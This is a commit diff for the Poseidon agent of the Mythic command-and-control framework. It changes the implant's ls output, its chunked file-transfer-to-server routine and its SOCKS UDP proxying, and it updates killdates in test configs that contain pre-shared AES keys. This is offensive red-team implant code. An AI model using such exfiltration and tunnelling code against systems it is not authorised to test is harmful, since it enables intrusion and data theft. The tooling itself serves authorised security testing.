updating socks and ls

Author: its-a-feature

Payload_Type/poseidon/go.sum

@@ -1,3 +1,4 @@
+github.com/MythicMeta/MythicContainer v1.4.9 h1:1RTY2xkKMahMjvTx1D0ScIgvxJLOV93nfnydbUw5AjM=
 github.com/MythicMeta/MythicContainer v1.4.9/go.mod h1:BnUYftqQ9KsGxBd6RlyRcAHBrqV1CUcrRCjktWwc2Do=
 github.com/coreos/go-systemd/v22 v22.5.0/go.mod h1:Y58oyj3AT4RCenI/lSvhwexgC+NSVTIJ3seZv2GcEnc=
 github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=

Payload_Type/poseidon/poseidon/agent_code/CHANGELOG.MD

@@ -4,6 +4,13 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](http://keepachangelog.com/en/1.0.0/)
 and this project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html).
 
+## 2.1.15 - 2025-01-17
+
+### Changed
+
+- Updated the `ls` command to not double return output and leverage the new SetAsUserOutput flag in file browser data
+- Updated the `socks` command to continue on UDP timeouts and accept responses from different source UDP ports
+
 ## 2.1.14 - 2024-12-08
 
 ### Changed

Payload_Type/poseidon/poseidon/agent_code/ls/ls.go

@@ -47,6 +47,7 @@ func Run(task structs.Task) {
 		return
 	}
 	var e structs.FileBrowser
+	e.SetAsUserOutput = true
 	fixedPath := args.Path
 	if strings.HasPrefix(fixedPath, "~/") {
 		dirname, _ := os.UserHomeDir()
@@ -116,8 +117,8 @@ func Run(task structs.Task) {
 	}
 	msg.Completed = true
 	msg.FileBrowser = &e
-	temp, _ := json.Marshal(msg.FileBrowser)
-	msg.UserOutput = string(temp)
+	//temp, _ := json.Marshal(msg.FileBrowser)
+	//msg.UserOutput = string(temp)
 	task.Job.SendResponses <- msg
 	return
 }

Payload_Type/poseidon/poseidon/agent_code/pkg/utils/files/sendFile.go

@@ -41,19 +41,18 @@ func sendFileMessagesToMythic(sendFileToMythic structs.SendFileToMythicStruct) {
 			sendFileToMythic.Task.Job.SendResponses <- errResponse
 			sendFileToMythic.FinishedTransfer <- 1
 			return
-		} else {
-			fi, err := sendFileToMythic.File.Stat()
-			if err != nil {
-				errResponse := structs.Response{}
-				errResponse.Completed = true
-				errResponse.TaskID = sendFileToMythic.Task.TaskID
-				errResponse.UserOutput = fmt.Sprintf("Error getting file size: %s", err.Error())
-				sendFileToMythic.Task.Job.SendResponses <- errResponse
-				sendFileToMythic.FinishedTransfer <- 1
-				return
-			}
-			size = fi.Size()
 		}
+		fi, err := sendFileToMythic.File.Stat()
+		if err != nil {
+			errResponse := structs.Response{}
+			errResponse.Completed = true
+			errResponse.TaskID = sendFileToMythic.Task.TaskID
+			errResponse.UserOutput = fmt.Sprintf("Error getting file size: %s", err.Error())
+			sendFileToMythic.Task.Job.SendResponses <- errResponse
+			sendFileToMythic.FinishedTransfer <- 1
+			return
+		}
+		size = fi.Size()
 	} else {
 		size = int64(len(*sendFileToMythic.Data))
 	}
@@ -100,16 +99,11 @@ func sendFileMessagesToMythic(sendFileToMythic structs.SendFileToMythicStruct) {
 
 		//log.Printf("Receive file download registration response %s\n", resp)
 		if _, ok := fileDetails["file_id"]; ok {
-			if ok {
-				updateUserOutput := structs.Response{}
-				updateUserOutput.TaskID = sendFileToMythic.Task.TaskID
-				updateUserOutput.UserOutput = "{\"file_id\": \"" + fmt.Sprintf("%v", fileDetails["file_id"]) + "\", \"total_chunks\": \"" + strconv.Itoa(int(chunks)) + "\"}\n"
-				sendFileToMythic.Task.Job.SendResponses <- updateUserOutput
-				break
-			} else {
-				//log.Println("Didn't find response with file_id key")
-				continue
-			}
+			updateUserOutput := structs.Response{}
+			updateUserOutput.TaskID = sendFileToMythic.Task.TaskID
+			updateUserOutput.UserOutput = "{\"file_id\": \"" + fmt.Sprintf("%v", fileDetails["file_id"]) + "\", \"total_chunks\": \"" + strconv.Itoa(int(chunks)) + "\"}\n"
+			sendFileToMythic.Task.Job.SendResponses <- updateUserOutput
+			break
 		}
 	}
 	var r *bytes.Buffer = nil
@@ -153,12 +147,12 @@ func sendFileMessagesToMythic(sendFileToMythic structs.SendFileToMythicStruct) {
 
 		fileDownloadData = structs.FileDownloadMessage{}
 		fileDownloadData.ChunkNum = int(i) + 1
-		//fileDownloadData.TotalChunks = -1
 		fileDownloadData.FileID = fileDetails["file_id"].(string)
 		fileDownloadData.ChunkData = base64.StdEncoding.EncodeToString(partBuffer)
 		fileDownloadMsg.Download = &fileDownloadData
 		sendFileToMythic.Task.Job.SendResponses <- fileDownloadMsg
 		newPercentComplete := ((fileDownloadData.ChunkNum * 100) / int(chunks))
+
 		if newPercentComplete/10 > lastPercentCompleteNotified && sendFileToMythic.SendUserStatusUpdates {
 			response := sendFileToMythic.Task.NewResponse()
 			response.Completed = false
@@ -180,12 +174,12 @@ func sendFileMessagesToMythic(sendFileToMythic structs.SendFileToMythicStruct) {
 				sendFileToMythic.FinishedTransfer <- 1
 				return
 			}
-			break
-		}
 
-		if strings.Contains(postResp["status"].(string), "success") {
-			// only go to the next chunk if this one was successful
-			i++
+			if strings.Contains(postResp["status"].(string), "success") {
+				// only go to the next chunk if this one was successful
+				i++
+				break
+			}
 		}
 	}
 	sendFileToMythic.FinishedTransfer <- 1

Payload_Type/poseidon/poseidon/agent_code/socks/socks.go

@@ -6,11 +6,14 @@ import (
 	"bytes"
 	"encoding/base64"
 	"encoding/json"
+	"errors"
 	"fmt"
 	"github.com/MythicAgents/poseidon/Payload_Type/poseidon/agent_code/pkg/responses"
+	"github.com/MythicAgents/poseidon/Payload_Type/poseidon/agent_code/pkg/utils"
 	"github.com/MythicAgents/poseidon/Payload_Type/poseidon/agent_code/pkg/utils/structs"
 	"io"
 	"net"
+	"os"
 	"strconv"
 	"strings"
 	"time"
@@ -313,9 +316,9 @@ func connectToUDPProxy(channelId uint32, toMythicSocksChannel chan structs.Socks
 	}
 	//fmt.Printf("read destination from udp proxy message: %s\n", dest.Address())
 
-	target, err := net.Dial("udp4", dest.Address())
+	localListen, err := net.ListenUDP("udp4", nil)
 	if err != nil {
-		fmt.Printf("failed to connect to udp proxy: %v\n", err)
+		utils.PrintDebug(fmt.Sprintf("failed to start listening for future responses: %v\n", err))
 		msg := structs.SocksMsg{
 			ServerId: channelId,
 			Exit:     true,
@@ -324,35 +327,39 @@ func connectToUDPProxy(channelId uint32, toMythicSocksChannel chan structs.Socks
 		return
 	}
 	//fmt.Printf("have %d bytes left to write\n", r.Len())
-
-	_, err = r.WriteTo(target)
+	_, err = localListen.WriteToUDP(data[len(data)-r.Len():], &net.UDPAddr{IP: dest.IP, Port: dest.Port})
+	//_, err = r.WriteTo(target)
 	if err != nil {
-		//fmt.Printf("failed to write to udp: %v\n", err)
+		utils.PrintDebug(fmt.Sprintf("failed to write to udp: %v\n", err))
 		msg := structs.SocksMsg{
 			ServerId: channelId,
 			Exit:     true,
 		}
 		toMythicSocksChannel <- msg
 		return
 	}
-	//fmt.Printf("wrote to %d udp proxy message\n", written)
+	//fmt.Printf("wrote %d bytes to udp proxy message\n", bytesLeft)
 	recvChan := make(chan structs.SocksMsg, 200)
 	addToMapChan <- addToMap{
 		ChannelID:  channelId,
-		Connection: target,
+		Connection: localListen,
 		NewChannel: recvChan,
 	}
-	go writeToUDPProxy(recvChan, target, channelId, toMythicSocksChannel)
+	go writeToUDPProxy(recvChan, localListen, channelId, toMythicSocksChannel)
 	for {
 		bufIn := make([]byte, 4096)
 		//fmt.Printf("about to read from udp proxy message\n")
-		err = target.SetReadDeadline(time.Now().Add(5 * time.Second))
+		err = localListen.SetReadDeadline(time.Now().Add(5 * time.Second))
 		if err != nil {
-			fmt.Printf("failed to set read deadline: %v\n", err)
+			utils.PrintDebug(fmt.Sprintf("failed to set read deadline: %v\n", err))
+		}
+		readLength, _, err := localListen.ReadFromUDP(bufIn)
+		if errors.Is(err, os.ErrDeadlineExceeded) {
+			//utils.PrintDebug(fmt.Sprintf("read deadline exceeded\n"))
+			continue
 		}
-		readLength, err := target.Read(bufIn)
 		if err != nil {
-			//fmt.Printf("failed to read from udp: %v\n", err)
+			utils.PrintDebug(fmt.Sprintf("failed to read from udp: %v\n", err))
 			msg := structs.SocksMsg{
 				ServerId: channelId,
 				Exit:     true,
@@ -361,6 +368,7 @@ func connectToUDPProxy(channelId uint32, toMythicSocksChannel chan structs.Socks
 			removeFromMapChan <- channelId
 			return
 		}
+		//fmt.Printf("remoteAddr: %v\n", remoteAddr)
 		if readLength > 0 {
 			msg := structs.SocksMsg{}
 			msg.ServerId = channelId
@@ -443,22 +451,25 @@ func writeToUDPProxy(recvChan chan structs.SocksMsg, conn net.Conn, channelId ui
 	w := bufio.NewWriter(conn)
 	for bufOut := range recvChan {
 		// Send a response back to person contacting us.
+		//fmt.Printf("got message to send to udp proxy: %v\n", bufOut.Data)
 		if bufOut.Exit {
 			w.Flush()
+			//fmt.Printf("got exit from mythic\n")
 			removeFromMapChan <- channelId
 			return
 		}
 		data, err := base64.StdEncoding.DecodeString(bufOut.Data)
 		if err != nil {
 			w.Flush()
+			utils.PrintDebug(fmt.Sprintf("error decoding data from mythic: %v\n", err))
 			removeFromMapChan <- channelId
 			return
 		}
 
 		r := bytes.NewReader(data)
 		header := []byte{0, 0, 0}
 		if _, err := r.Read(header); err != nil {
-			//fmt.Printf("failed to connect to read header: %v\n", err)
+			utils.PrintDebug(fmt.Sprintf("failed to connect to read header: %v\n", err))
 			msg := structs.SocksMsg{
 				ServerId: channelId,
 				Exit:     true,
@@ -468,7 +479,7 @@ func writeToUDPProxy(recvChan chan structs.SocksMsg, conn net.Conn, channelId ui
 		}
 		_, err = ReadAddrSpec(r)
 		if err != nil {
-			//fmt.Printf("failed to read remote address: %v\n", err)
+			utils.PrintDebug(fmt.Sprintf("failed to read remote address: %v\n", err))
 			msg := structs.SocksMsg{
 				ServerId: channelId,
 				Exit:     true,
@@ -478,6 +489,7 @@ func writeToUDPProxy(recvChan chan structs.SocksMsg, conn net.Conn, channelId ui
 		}
 		_, err = r.WriteTo(w)
 		if err != nil {
+			utils.PrintDebug(fmt.Sprintf("failed to write to proxy: %v\n", err))
 			removeFromMapChan <- channelId
 			return
 		}

Payload_Type/poseidon/poseidon/agent_code/test_agent_config_dynamichttp.json

@@ -1,7 +1,7 @@
 {
   "callback_jitter": 0,
   "callback_interval": 2,
-  "killdate": "2024-12-31",
+  "killdate": "2025-12-31",
   "encrypted_exchange_check": true,
   "AESPSK": "YBRX8nRTYUrkKue/HhEgm+F7gG304uqPdZQwzZ+vaL8=",
   "raw_c2_config": {

Payload_Type/poseidon/poseidon/agent_code/test_agent_config_http.json

@@ -1,7 +1,7 @@
 {
   "callback_host": "http://127.0.0.1",
   "callback_port": 80,
-  "killdate": "2024-12-31",
+  "killdate": "2025-12-31",
   "callback_interval": 2,
   "callback_jitter": 0,
   "post_uri": "data",

Payload_Type/poseidon/poseidon/agent_code/test_agent_config_httpx.json

@@ -1,7 +1,7 @@
 {
   "callback_jitter": 0,
   "callback_interval": 2,
-  "killdate": "2024-12-31",
+  "killdate": "2025-12-31",
   "encrypted_exchange_check": true,
   "AESPSK": "ye6wt4oUi50HDnoNskj1e5HxIpWQWyJ1BeaSohZtbrk=",
   "failover_threshold": 2,

Payload_Type/poseidon/poseidon/agent_code/test_agent_config_tcp.json

@@ -1,6 +1,6 @@
 {
   "port": 8085,
-  "killdate": "2024-12-31",
+  "killdate": "2025-12-31",
   "encrypted_exchange_check": true,
   "AESPSK": "7JSBbGON1cHI4xtpxR0M41qQulCBD+DgyABLr6hpjFc="
 }

Payload_Type/poseidon/poseidon/agent_code/test_agent_config_websocket.json

@@ -8,6 +8,6 @@
   "encrypted_exchange_check": true,
   "domain_front": "",
   "callback_jitter": 0,
-  "killdate": "2024-12-31",
+  "killdate": "2025-12-31",
   "tasking_type": "Push"
 }

Payload_Type/poseidon/poseidon/agentfunctions/builder.go

@@ -20,7 +20,7 @@ import (
 	"time"
 )
 
-const version = "2.1.14"
+const version = "2.1.15"
 
 type sleepInfoStruct struct {
 	Interval int       `json:"interval"`

agent_capabilities.json

@@ -10,6 +10,6 @@
   "architectures": ["x86_64", "arm_64"],
   "c2": ["http", "websocket", "dynamichttp", "poseidon_tcp"],
   "mythic_version": "3.3.0",
-  "agent_version": "2.1.11",
+  "agent_version": "2.1.15",
   "supported_wrappers": []
 }